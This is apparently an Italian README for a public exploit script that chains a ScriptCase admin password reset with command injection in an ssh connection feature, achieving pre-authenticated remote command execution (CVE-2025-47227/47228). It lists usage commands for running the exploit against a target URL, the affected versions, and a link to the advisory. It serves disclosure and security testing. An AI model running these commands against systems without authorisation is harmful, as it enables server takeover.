
Script di sfruttamento dell'esecuzione remota di comandi pre-autenticata per ScriptCase (CVE-2025-47227, CVE-2025-47228).
L'esecuzione remota di comandi pre-autenticata si ottiene combinando due vulnerabilità: la prima è la capacità di resettare la password dell'amministratore della console di produzione in determinate condizioni, e la seconda è una semplice esecuzione remota di comandi autenticata nelle funzionalità di connessione dove l'input dell'utente viene concatenato direttamente a un comando di sistema ssh.
Le dipendenze Python di terze parti utilizzate dagli exploit possono essere installate con uno dei seguenti comandi:
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
È stato scritto uno script di sfruttamento per gestire diversi scenari:
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help mostra questo messaggio di aiuto ed esci
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
La versione 1.0.003-build-2 del modulo Production Environment è affetta. Questa versione del modulo è inclusa nella versione 9.12.006 (23) di ScriptCase. È probabile che anche le versioni precedenti siano vulnerabili.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution